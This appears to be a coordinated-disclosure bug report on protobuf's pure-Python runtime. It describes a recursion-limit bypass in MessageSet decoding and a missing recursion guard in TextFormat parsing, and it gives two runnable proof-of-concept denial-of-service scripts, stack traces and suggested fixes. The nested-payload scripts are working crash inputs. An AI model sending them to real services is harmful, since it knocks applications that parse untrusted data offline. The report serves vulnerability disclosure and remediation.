Description
Important note: I submitted this issue to the Google VRP team a few days ago. The team approved filing it as a public GitHub issue.
Summary:
The Protobuf pure-Python implementation is vulnerable to a recursion depth limit bypass in the MessageSet decoding path and a complete lack of recursion guards in the TextFormat parser. These issues allow an attacker to trigger a stack overflow (RecursionError) leading to a Denial of Service (DoS) in applications parsing untrusted data. Crucially, the MessageSet issue is a direct bypass of the fix implemented for GHSA-8qvm-5x2c-j2w7.
Affected Component: protocolbuffers/protobuf (Python runtime)
Version: Current main (Commit: 18da8e12d)
Environment Tested:
- Python: 3.10.12
- protoc: 3.12.4 (libprotoc)
- OS: Ubuntu 22.04 (WSL2)
Technical Description
While investigating the recent fix for GHSA-8qvm-5x2c-j2w7 (Recursion DoS in Python), I identified two significant regressions/oversights in how recursion depth is tracked.
1. MessageSet Depth Reset Bypass (Official Library Code)
In the official library file decoder.py, the function _DecodeUnknownField was updated to accept a current_depth parameter. However, specialized decoders for MessageSet items fail to propagate this counter.
Specifically, at lines 869 and 939 of the official source, calls to _DecodeUnknownField omit the current_depth argument:
# decoder.py:869 (MessageSetItemDecoder.DecodeItem)
# decoder.py:939 (UnknownMessageSetItemDecoder.DecodeUnknownItem)
field_number, wire_type = DecodeTag(tag_bytes)
_, pos = _DecodeUnknownField(buffer, pos, end, field_number, wire_type)
Because _DecodeUnknownField defaults to current_depth=0, the recursion counter is reset to zero for every unknown item within a MessageSet.
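The depth-reset pattern described above can be illustrated with a toy model. This is a minimal sketch, not the code in decoder.py: `decode_group`, `item_decoder_buggy`, `item_decoder_fixed`, `make_nested`, and `DepthError` are hypothetical names introduced for illustration, and the limit of 100 is taken from this report.

```python
RECURSION_LIMIT = 100  # stand-in for the decoder's limit cited in this report


class DepthError(Exception):
    """Raised by the toy decoder when nesting exceeds RECURSION_LIMIT."""


def decode_group(nested, current_depth=0):
    """Toy recursive decoder: `nested` is either [] or a list holding the next level."""
    current_depth += 1
    if current_depth > RECURSION_LIMIT:
        raise DepthError(f"too many nested levels: {current_depth}")
    if nested:
        return 1 + decode_group(nested[0], current_depth)
    return 1


def make_nested(levels):
    """Build a list nested `levels` deep without recursing."""
    node = []
    for _ in range(levels - 1):
        node = [node]
    return node


def item_decoder_buggy(item, current_depth):
    # Mirrors the reported pattern: the caller's depth is dropped,
    # so the callee starts again from its default of 0.
    return decode_group(item)


def item_decoder_fixed(item, current_depth):
    # Propagates the caller's depth so the limit applies to the whole message.
    return decode_group(item, current_depth)


if __name__ == "__main__":
    item = make_nested(80)
    # Logical depth is 80 (parent) + 80 (item) = 160, above the limit of 100.
    print("buggy decoder parsed levels:", item_decoder_buggy(item, 80))
    try:
        item_decoder_fixed(item, 80)
    except DepthError as exc:
        print("fixed decoder rejected input:", exc)
```

In this model the buggy wrapper accepts 80 further levels at a parent depth of 80, while the wrapper that forwards `current_depth` rejects the same input once the combined depth passes the limit.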
2. Missing Guards in TextFormat
Inspection of text_format.py confirms that it contains no references to current_depth, recursion_limit, or any other recursion guard. Unlike the binary decoder or the JSON parser, text_format.Merge() relies solely on the Python interpreter's recursion limit, which is easily exhausted.
Attack Scenario
An attacker sends a specially crafted, deeply nested Protobuf message to a service that uses the pure-Python implementation.
- Text Remote DoS: A service that parses user-provided configuration or debugging info via text_format.Merge can be crashed with a payload of nested braces (e.g., nested { nested { ... } }).
- Binary Bypass: A service that has already been "patched" for GHSA-8qvm-5x2c-j2w7 but allows MessageSet (common in older Google infrastructure) remains vulnerable. The attacker can use the "depth reset" bug to trigger the exact crash the original fix intended to prevent.
Reproduction Steps
Environment Setup (WSL/Linux)
# Clone and setup venv
git clone https://github.com/protocolbuffers/protobuf.git
cd protobuf
python3 -m venv venv
source venv/bin/activate
pip install absl-py
PoC 1: TextFormat DoS
Create reproduce_text.py:
import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
from google.protobuf import text_format
from google.protobuf import descriptor_pb2
msg = descriptor_pb2.DescriptorProto()
payload = "nested_type { " * 1000 + "}" * 1000
try:
    print("Starting TextFormat.Merge...")
    text_format.Merge(payload, msg)
except RecursionError:
    print("VULNERABILITY CONFIRMED: TextFormat triggered RecursionError (DoS)")
PoC 2: MessageSet Bypass (Low-Level Proof)
Because high-level PB2 generation is complex in local source trees, the bypass is verified by simulating the internal call pattern in decoder.py.
Create reproduce_bypass.py:
import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))
from google.protobuf.internal import decoder
from google.protobuf.internal import encoder
# Simulate reaching depth 80
parent_depth = 80
# Payload with another 80 levels (Total 160, > limit 100)
payload = encoder.TagBytes(10, 3) * 80 + encoder.TagBytes(10, 4) * 80
print(f"--- Logical Depth: {parent_depth + 80} (Limit: 100) ---")
try:
    # Simulating the vulnerable MessageSet call (omitting current_depth)
    decoder._DecodeUnknownField(memoryview(payload), 0, len(payload), 10, 3)
    print("BYPASS CONFIRMED: Successfully parsed 160 levels because depth reset to 0.")
except Exception as e:
    print(f"FAILED: {e}")
Comparison of Execution Paths:
- Vulnerable Path (Bypass): _DecodeUnknownField(payload, ..., current_depth=None)
  - Result: SUCCESS: Parsed 80 children despite being at logical depth 160!
  - Note: The vulnerability allows the parser to bypass the library's intended security block (a DecodeError), which is what enables an attacker to reach deeper, unsafe recursion levels.
- System Crash Proof (Hard Proof): By simulating a higher parent depth (e.g., 80) and a child depth of 80 (Total 160), we can see the bypass in action on a constrained stack.
  - Environment Limit: 150 levels.
  - Protobuf Limit: 100 levels.
  - Vulnerable Result: CRASHED (RecursionError)!!
  - Logic: Because the Protobuf guard reset to 0, it allowed deeper nesting (160) than the system could handle (150). A properly functioning guard would have caught this at 100 and prevented the crash.
- System Crash Trace (MessageSet Bypass):
Traceback (most recent call last):
  File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet
    (data, pos) = _DecodeUnknownField(
  File "protobuf/python/google/protobuf/internal/decoder.py", line 1065, in _DecodeUnknownField
    data, pos = _DecodeUnknownFieldSet(buffer, pos, end_pos, current_depth)
  File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet
    (data, pos) = _DecodeUnknownField(
  File "protobuf/python/google/protobuf/internal/decoder.py", line 1059, in _DecodeUnknownField
    end_tag_bytes = encoder.TagBytes(
  File "protobuf/python/google/protobuf/internal/encoder.py", line 400, in TagBytes
    return bytes(_VarintBytes(wire_format.PackTag(field_number, wire_type)))
  File "protobuf/python/google/protobuf/internal/wire_format.py", line 65, in PackTag
    if not 0 <= wire_type <= _WIRETYPE_MAX:
RecursionError: maximum recursion depth exceeded in comparison
Stack Trace (PoC 1: TextFormat DoS)
Traceback (most recent call last):
  File "protobuf/python/google/protobuf/text_format.py", line 754, in _MergeField
    self._MergeField(tokenizer.next_token, message)
  File "protobuf/python/google/protobuf/text_format.py", line 872, in _MergeMessageField
    tokenizer.Consume('{')
  File "protobuf/python/google/protobuf/text_format.py", line 1409, in Consume
    if not self.TryConsume(token):
  File "protobuf/python/google/protobuf/text_format.py", line 1396, in TryConsume
    self.NextToken()
  File "protobuf/python/google/protobuf/text_format.py", line 1663, in NextToken
    self._SkipWhitespace()
  [... recursive calls skip whitespace and pop lines ...]
  File "protobuf/python/google/protobuf/text_format.py", line 1364, in _PopLine
    while len(self._current_line) <= self._column:
RecursionError: maximum recursion depth exceeded while calling a Python object
Suggested Remediation
- For MessageSet: Update MessageSetItemDecoder and UnknownMessageSetItemDecoder in decoder.py to accept and pass the current_depth parameter to all internal parsing calls.
- For TextFormat: Implement a _RECURSION_LIMIT constant (matching the binary decoder's 100) and add increment/decrement logic in _MergeField to raise a ParseError when exceeded.
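The increment/decrement guard suggested for TextFormat might look roughly like the following. This is a sketch on a toy brace parser, not a patch for text_format.py: `ToyParser`, `merge_field`, `parse`, and the local `ParseError` class are hypothetical stand-ins, and the grammar handles only `name { ... }` blocks.

```python
import re

_RECURSION_LIMIT = 100  # value proposed in this report; an assumption in this sketch


class ParseError(Exception):
    """Local stand-in for a parser error; not the library's own class."""


class ToyParser:
    """Recursive-descent parser for `name { field* }` with a depth guard."""

    def __init__(self, text):
        # Tokens are braces or identifiers; whitespace is skipped by the regex.
        self._tokens = re.findall(r"[{}]|[A-Za-z_]\w*", text)
        self._pos = 0
        self._depth = 0

    def peek(self):
        return self._tokens[self._pos] if self._pos < len(self._tokens) else None

    def _next(self):
        tok = self.peek()
        if tok is None:
            raise ParseError("unexpected end of input")
        self._pos += 1
        return tok

    def merge_field(self):
        """Parse one field and return the deepest nesting level seen inside it."""
        name = self._next()
        if name in ("{", "}"):
            raise ParseError(f"expected field name, got {name!r}")
        if self._next() != "{":
            raise ParseError(f"expected '{{' after {name!r}")
        self._depth += 1  # entering a nested message
        try:
            if self._depth > _RECURSION_LIMIT:
                raise ParseError(f"nesting deeper than {_RECURSION_LIMIT} levels")
            deepest = self._depth
            while self.peek() not in ("}", None):
                deepest = max(deepest, self.merge_field())
            self._next()  # consume '}' (raises ParseError if input ended)
            return deepest
        finally:
            self._depth -= 1  # leaving the nested message, even on error


def parse(text):
    """Parse all top-level fields and return the maximum nesting depth."""
    parser = ToyParser(text)
    deepest = 0
    while parser.peek() is not None:
        deepest = max(deepest, parser.merge_field())
    return deepest


if __name__ == "__main__":
    print(parse("a { b { } c { d { } } }"))
    try:
        parse("nested_type { " * 1000 + "}" * 1000)
    except ParseError as exc:
        print("rejected:", exc)
```

Decrementing in a `finally` block keeps the counter consistent when a nested field raises, so a parser instance that is reused after an error does not carry a stale depth.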